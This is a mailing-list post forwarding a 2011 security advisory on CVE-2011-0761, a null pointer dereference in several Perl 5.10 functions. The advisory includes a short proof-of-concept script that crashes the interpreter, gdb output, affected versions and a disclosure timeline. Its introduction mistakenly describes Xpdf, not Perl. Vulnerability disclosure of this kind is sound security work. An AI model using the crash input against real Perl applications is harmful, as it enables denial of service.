Fwd: [Full-disclosure] TSSA-2011-03 - Perl : multiple functions null pointer dereference uppon parameters injection

Jacqui Caren-home jacqui.caren at ntlworld.com
Mon May 9 12:01:32 BST 2011


FYI: may be old news but worth repeating.
Not sure why xpdf is doc'd as the "vendor" :-)

Jacqui

-------- Original Message --------
Subject: [Full-disclosure] TSSA-2011-03 - Perl : multiple functions null pointer dereference uppon parameters injection
Date: Mon, 9 May 2011 10:52:20 +0200
From: Advisories Toucan-System <advisories at toucan-system.com>
To: bugtraq at securityfocus.com, full-disclosure at lists.grok.org.uk

---------------------------------------------------------------------------
*          Perl : multiple functions null pointer dereference            *
*                      uppon parameters injection                        *
---------------------------------------------------------------------------




--[ Vulnerability Summary:

Date Published: 03/05/2011
Last Update: 03/05/2011
Advisory ID: TSSA-2011-03
CVE Name: CVE-2011-0761
Title: Perl : multiple functions null pointer dereference
Remotely Exploitable: Yes
Locally Exploitable: No
Impact: Remote DoS
Advisory URL: http://www.toucan-system.com/advisories/tssa-2011-03.txt



--[ Introduction:

     Following 3 paragraphs taken from the vendors' documentation:

     Xpdf is an open source viewer for Portable Document Format (PDF)
     files.  (These are also sometimes also called 'Acrobat' files, from
     the name of Adobe's PDF software.)  The Xpdf project also includes a
     PDF text extractor, PDF-to-PostScript converter, and various other
     utilities.

     Xpdf runs under the X Window System on UNIX, VMS, and OS/2.  The non-X
     components (pdftops, pdftotext, etc.) also run on Win32 systems and
     should run on pretty much any system with a decent C++ compiler.

     Xpdf is designed to be small and efficient.  It can use Type 1 or
     TrueType fonts.


--[ Synopsis:

     When given a wrong number of arguments, a number of perl functions
     will attempt to read memory from an unmapped location, resulting
     in a deterministic crash.

--[ Vulnerability overview:

     The perl functions vulnerable to this attack are:

       getpeername()
       readdir()
       closedir()
       getsockname()
       readdir()
       rewinddir()
       tell()
       telldir()

     When given a wrong number of arguments, those functions will
     attempt to perform a comparison between an unalocated memory
     zone and a given register, resulting in a segmentation fault:

     jonathan at blackbox:~/test$ cat poc1.pl
     #!/usr/bin/perl
     $a =
getsockname(9505,4590,"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA",17792);
     jonathan at blackbox:~/test$ perl poc1.pl
     Segmentation fault (core dumped)
     jonathan at blackbox:~/test$

     More precisely, the Perl_gv_IOadd() function is invoqued and
     attempts to perform a comparison:

gdb $ r ./poc1.pl
[Thread debugging using libthread_db enabled]

Program received signal SIGSEGV, Segmentation fault.
---------------------------------------------------------------[regs]
eax:08178008 ebx:00000000  ecx:080C53B0  edx:000000F4 eflags:00210282
esi:00000000 edi:0817D554  esp:BFFFF640  ebp:BFFFF658 eip:08082B42
cs:0073  ds:007B  es:007B  fs:0000  gs:0033  ss:007B o d I t S z a p c
[0073:08082B42]------------------------------------------------[code]
--[ Instruction:
=> 0x8082b42 <Perl_gv_IOadd+18>:    cmp    BYTE PTR [ebx+0x8],0x9

     The register ebx being null, the application actually tries to
     read from the (unmapped) first page, resulting in a null
     pointer dereference, and eventually a crash.


--[ Impact:

     Perl not being a compiled language, injection of wrong number of
     parameters is technically possible (in very much the same way as
     say, sql injections).

     It is in any case not possible to execute code directly using this
     vulnerability as null pointers dereferences in the first page are not
     exploitable under modern OSes.

     But, if a given third party perl web application was calling one
     of the above listed vulnerable functions in a way allowing
     parameter injections, while performing a critical operation
     requiring some degree of atomicity, it would be possible to
    interrupt the execution of this operation before it completes,
    hence breaking the business logic assumptions of the web
    applications designers.

     Wether this vulnerability actually allows to steal millions from
     widespread perl web applications has not been investigated and
     won't be dulled about.


--[ Vulnerable versions:

     Vulnerable : Perl version 5.10.x.

     In particular, versions 5.10.1 of perl as shipped with ubuntu
     10.04 and 10.10 as well as version 5.10.0 provided with OSX
     10.6 are known to be vulnerable.

     Non vulnerable : Perl version <= 5.10.0 OR >= 5.12.0.


--[ Disclosure timeline:

     * 05/01/2011: Toucan System contacts the CERT, providing full
     description and PoC samples to audit the issue.

     * 10/02/2011: The CERT is able to replicate the bug under both
     ubuntu 10.04 and ubuntu 10.10, and therefor forwards the PoCs
     to the perl team.

     * 11/02/2011: The Perl Team acknowledge the vulnerability and starts
     investigating which exact versions are vulnerable.

     * 11/02/2011: The CERT assigns CVE-2011-0761 to this vulnerability.

     * 15/02/2011: The Perl Team notifies us that stable version 5.12.0
     is not vulnerable to this bug.

     * 18/04/2011: Public disclosure.


--[ Credits:

     Those vulnerabilities were discovered by Jonathan Brossard from
     Toucan System.


--[ About Toucan System:

     Toucan System is a French computer security company providing
     cutting edge research and security consulting to Fortune 500
     as well as smaller companies globally, thanks to a wide range
     of expertise ranging from Reverse Engineering and binary
     analysis to cryptography and Risk Management.

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



More information about the london.pm mailing list